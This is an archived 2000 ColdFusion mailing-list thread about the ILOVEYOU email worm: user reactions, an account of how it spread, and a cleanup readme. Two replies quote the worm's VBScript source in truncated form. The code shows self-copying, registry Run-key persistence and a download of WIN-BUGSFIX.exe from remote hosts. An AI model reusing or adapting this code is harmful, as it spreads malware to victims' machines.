relatively easy it is to write a trojan that can inflict a lot of 
damage.

For some reason, this one was more prolific than Happy99.exe or 
Melissa.. I wonder why.
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Craig M. Rosenblum 

I'd like to apologize, the virus took over my machine and may have sent some
copies...

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

Re: ILOVEYOU

2000-05-04 Thread Fred T. Sanders 

Not to pin this on Craig, but I'm really starting to hate the phrase
ILOVEYOU even more than my natural male tendencies to hate saying it.

Fred

- Original Message -
From: "Craig M. Rosenblum" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, May 04, 2000 2:51 PM
Subject: RE: ILOVEYOU


> I'd like to apologize, the virus took over my machine and may have sent
some
> copies...
>


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

Re: ILOVEYOU

2000-05-04 Thread Tiffany - Tech Support 

http://www.cnn.com/2000/TECH/computing/03/23/hacker.feds.idg/index.html

Yep. It's a doozie.

-Tiffany

- Original Message -
From: Dave Hannum <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, May 04, 2000 10:41 AM
Subject: Re: ILOVEYOU


> This is the third time I've been sent this virus today - all by
different people
>
>
> =
> "Always Drink Upstream From The Herd!"
>
> David Hannum
> Web Analyst/Programmer
> Ohio University
> [EMAIL PROTECTED]
> (740) 597-2524
>
>
>
> - Original Message -
> From: Frank Kowalewicz <[EMAIL PROTECTED]>
> To: Cold Fusion <[EMAIL PROTECTED]>
> Sent: Thursday, May 04, 2000 8:24 AM
> Subject: ILOVEYOU
>
>
> This is a multi-part message in MIME format.
>
> --=_NextPart_000_0038_01BFB5AA.7BC26B30
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
>
>
> kindly check the attached LOVELETTER coming from me.
> --=_NextPart_000_0038_01BFB5AA.7BC26B30
> Content-Type: application/octet-stream;
> name="LOVE-LETTER-FOR-YOU.TXT.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
> filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
>
> rem  barok -loveletter(vbe) 
> rem by: spyder  /  [EMAIL PROTECTED]  /  @GRAMMERSoft Group  /  =
> Manila,Philippines
> On Error Resume Next
> dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
> eq=3D""
> ctr=3D0
> Set fso =3D CreateObject("Scripting.FileSystemObject")
> set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
> vbscopy=3Dfile.ReadAll
> main()
> sub main()
> On Error Resume Next
> dim wscr,rr
> set wscr=3DCreateObject("WScript.Shell")
> rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
> Scripting Host\Settings\Timeout")
> if (rr>=3D1) then
> wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
> Host\Settings\Timeout",0,"REG_DWORD"
> end if
> Set dirwin =3D fso.GetSpecialFolder(0)
> Set dirsystem =3D fso.GetSpecialFolder(1)
> Set dirtemp =3D fso.GetSpecialFolder(2)
> Set c =3D fso.GetFile(WScript.ScriptFullName)
> c.Copy(dirsystem&"\MSKernel32.vbs")
> c.Copy(dirwin&"\Win32DLL.vbs")
> c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> regruns()
> html()
> spreadtoemail()
> listadriv()
> end sub
> sub regruns()
> On Error Resume Next
> Dim num,downread
> regcreate =
>
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKerne
=
> l32",dirsystem&"\MSKernel32.vbs"
> regcreate =
>
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
=
> \Win32DLL",dirwin&"\Win32DLL.vbs"
> downread=3D""
> downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
> Explorer\Download Directory")
> if (downread=3D"") then
> downread=3D"c:\"
> end if
> if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
> Randomize
> num =3D Int((4 * Rnd) + 1)
> if num =3D 1 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
>
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmh
=
> Pnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
> elseif num =3D 2 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
>
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwe
=
> rWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
> elseif num =3D 3 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
>
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQ
=
> ZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
> elseif num =3D 4 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
>
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDG
=
>
jkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B
=
> UGSFIX.exe"
> end if
> end if
> if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
> regcreate =
>
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUG
=
> SFIX",downread&"\WIN-BUGSFIX.exe"
> regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
> Explorer\Main\Start Page","about:blank"
> end if
> end sub
> sub listadriv
> On Error Resume Next
> Dim d,dc,s
> Set dc =3D fso.Drives
> For Each d in dc
> If d.DriveType =3D 2 or d.DriveType=3D3 Then
&

RE: ILOVEYOU

2000-05-04 Thread Rob Sherman 

Lol.. all this LOVE being spread and no one shagging... ;-)


Sincerely,

Rob Sherman
--
Developer / Allaire Certified Instructor
Email:[EMAIL PROTECTED]
ICQ:_3266081
AIM:__RobSSherm
Yahoo!:RobSherman_CFDev
Office:__(310) 543-1622
Office Fax:__(310) 543-0512
VMail/Fax:__(310) 754-6016 ext. 5630




--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Jennifer 

The no-attachment rule has eliminated all the sound effects...

At 02:47 PM 5/4/00 -0700, you wrote:
>Lol.. all this LOVE being spread and no one shagging... ;-)

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Tobe Goldfinger 

These type of email viruses tend to send themselves to the first 20 or so 
addresses in someone's address book. Since cf-talk is high in alphabetical 
order, we tend to get a lot of these kinds of viruses sent to this list in 
particular.

gee. maybe we should rename the list zzcf-talk :)

Tobe

At 01:15 PM 5/4/2000 , you wrote:
> > Frank WHY did you send this??
>
>He didn't send it on purpose.. CF-Talk was in his Outlook address book
>and so the trojan sent itself.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-05 Thread Jennifer 

Actually, one reason that this one was more of a problem than Melissa was 
that there was no limit on the number of addresses pulled from the address 
book. Melissa limited to 50.

At 08:31 PM 5/4/00 -0400, you wrote:
>These type of email viruses tend to send themselves to the first 20 or so
>addresses in someone's address book. Since cf-talk is high in alphabetical
>order, we tend to get a lot of these kinds of viruses sent to this list in
>particular.
>
>gee. maybe we should rename the list zzcf-talk :)
>
>Tobe
>
>At 01:15 PM 5/4/2000 , you wrote:
> > > Frank WHY did you send this??
> >
> >He didn't send it on purpose.. CF-Talk was in his Outlook address book
> >and so the trojan sent itself.
>
>--
>Archives: http://www.eGroups.com/list/cf-talk
>To Unsubscribe visit 
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or 
>send a message to [EMAIL PROTECTED] with 'unsubscribe' in 
>the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

Re: ILOVEYOU

2000-05-05 Thread Randy Adkins 

No offense to anyone, however this is a Cold Fusion list and we are
here to assist others with CF related issues and gain answers to our
own problems if needed.

For virus messages, please seek another list.
Lets not overload this one with repetitive information that does not
pertain to Cold Fusion.

Thanks!


- Original Message -
From: "Jennifer" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, May 05, 2000 11:44 AM
Subject: RE: ILOVEYOU


> Actually, one reason that this one was more of a problem than Melissa was
> that there was no limit on the number of addresses pulled from the address
> book. Melissa limited to 50.
>
> At 08:31 PM 5/4/00 -0400, you wrote:
> >These type of email viruses tend to send themselves to the first 20 or so
> >addresses in someone's address book. Since cf-talk is high in
alphabetical
> >order, we tend to get a lot of these kinds of viruses sent to this list
in
> >particular.
> >
> >gee. maybe we should rename the list zzcf-talk :)
> >
> >Tobe
> >
> >At 01:15 PM 5/4/2000 , you wrote:
> > > > Frank WHY did you send this??
> > >
> > >He didn't send it on purpose.. CF-Talk was in his Outlook address book
> > >and so the trojan sent itself.
> >
>
>---
---
> >Archives: http://www.eGroups.com/list/cf-talk
> >To Unsubscribe visit
> >http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk
or
> >send a message to [EMAIL PROTECTED] with 'unsubscribe' in
> >the body.
>
> --

> Archives: http://www.eGroups.com/list/cf-talk
> To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

Re: ILOVEYOU (cleanup)

2000-05-04 Thread Larry Lyons 

Eric,

NetAssets.net have announced an ILOVEYOU virus fix. Try this link:

http://www.netassets.net
 
>From the Read Me for removing "ILOVEYOU" virus

--

Before this fix works you MUST kill a process called WSCRIPT. This process,
if running,
will not allow the file MSKernel32.vbs to be deleted.

To KILL this process, you must have the rights, Hit CTRL-ALT-DELETE and on
NT, Choose 
the process TAB and search for and KILL the process WSCRIPT.

After you have Killed the process you can run the VBScript called
UNLOVE.vbs.


The "ILOVEYOU" virus adds three files to your C: Drive.
MSKernel32.vbs
Win32DLL.vbs
LOVE-LETTER-FOR-YOU.TXT.vbs
It also make a number of registry edits to start some services each time you
boot.

The "UNLOVE" script kills these files and removes the erroneous registry
edits.
This is not a complete virus killer or protection program.  This is a quick
fix
to restore your machine to working order.  Please check with your virus
software
provider for a complete fix.

NetAssets.net Development Team
 
--


HTH,
larry
--
Larry C. Lyons
EBStor.com
8870 Rixlew Lane, Suite 204
Manassas, Virginia 20109-3795
tel:   (703) 393-7930
fax:   (703) 393-2659
Web:   http://www.pacel.com
   http://www.ebstor.com
email: [EMAIL PROTECTED]
Chaos, panic, and disorder - my work here is done.
-- 

"Eric Dawson" <[EMAIL PROTECTED]> wrote in message
news:<[EMAIL PROTECTED]>...
> i am up to 5 now. unfortunately two of them on my network. so I have to do
a 
> cleanup. What does the virus do? and what is the best course of cleanup.
> 
> Eric
> 
> From: "Dave Hannum" <[EMAIL PROTECTED]>
> Reply-To: [EMAIL PROTECTED]
> To: <[EMAIL PROTECTED]>
> Subject: Re: ILOVEYOU
> Date: Thu, 4 May 2000 09:41:42 -0500
> 
> This is the third time I've been sent this virus today - all by different 
> people
> 
> 
> =
> "Always Drink Upstream From The Herd!"
> 
> David Hannum
> Web Analyst/Programmer
> Ohio University
> [EMAIL PROTECTED]
> (740) 597-2524
> 
> 
> 
> - Original Message -
> From: Frank Kowalewicz <[EMAIL PROTECTED]>
> To: Cold Fusion <[EMAIL PROTECTED]>
> Sent: Thursday, May 04, 2000 8:24 AM
> Subject: ILOVEYOU
> 
> 
> This is a multi-part message in MIME format.
> 
> --=_NextPart_000_0038_01BFB5AA.7BC26B30
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> 
> 
> kindly check the attached LOVELETTER coming from me.
> --=_NextPart_000_0038_01BFB5AA.7BC26B30
> Content-Type: application/octet-stream;
> name="LOVE-LETTER-FOR-YOU.TXT.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
> filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
> 
> rem  barok -loveletter(vbe) 
> rem by: spyder  /  [EMAIL PROTECTED]  /  @GRAMMERSoft Group  /  =
> Manila,Philippines
> On Error Resume Next
> dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
> eq=3D""
> ctr=3D0
> Set fso =3D CreateObject("Scripting.FileSystemObject")
> set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
> vbscopy=3Dfile.ReadAll
> main()
> sub main()
> On Error Resume Next
> dim wscr,rr
> set wscr=3DCreateObject("WScript.Shell")
> rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
> Scripting Host\Settings\Timeout")
> if (rr>=3D1) then
> wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
> Host\Settings\Timeout",0,"REG_DWORD"
> end if
> Set dirwin =3D fso.GetSpecialFolder(0)
> Set dirsystem =3D fso.GetSpecialFolder(1)
> Set dirtemp =3D fso.GetSpecialFolder(2)
> Set c =3D fso.GetFile(WScript.ScriptFullName)
> c.Copy(dirsystem&"\MSKernel32.vbs")
> c.Copy(dirwin&"\Win32DLL.vbs")
> c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> regruns()
> html()
> spreadtoemail()
> listadriv()
> end sub
> sub regruns()
> On Error Resume Next
> Dim num,downread
> regcreate =
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKerne=
> l32",dirsystem&"\MSKernel32.vbs"
> regcreate =
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
> \Win32DLL",dirwin&"\Win32DLL.vbs"
> downread=3D""
> downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
> Explorer\Download Directory")
> if (downread=3D"") then
> downread=3D"c:\"
> end if
> if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
> Randomize
> num =3D Int((4 * Rnd) + 1)
> if num =3D 1 then
> regcreate

Re: ILOVEYOU (cleanup)

2000-05-04 Thread Eric Dawson 

thanks. I appreciate the info and the help.

I got lucky. let me tell you that. I lost 2000 clip art images (what was 
that doing on the network anyway), and discovered a huge backup hole. whew. 
:) but all in all nothing critical damaged.

but I am a little scared.

Does anyone know know of an online backup companies. Just for critical 
information like SQL databases etc. Nightly is more than sufficient.

(while I am scared, it would be a good time to visit all those virus 
checking and backup procedures. hmmm I think I am going to get a firesafe 
too!)

h. this might justify a PC, big harddrive and high speed internet 
connection at home. h.

Thanks
Eric



Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.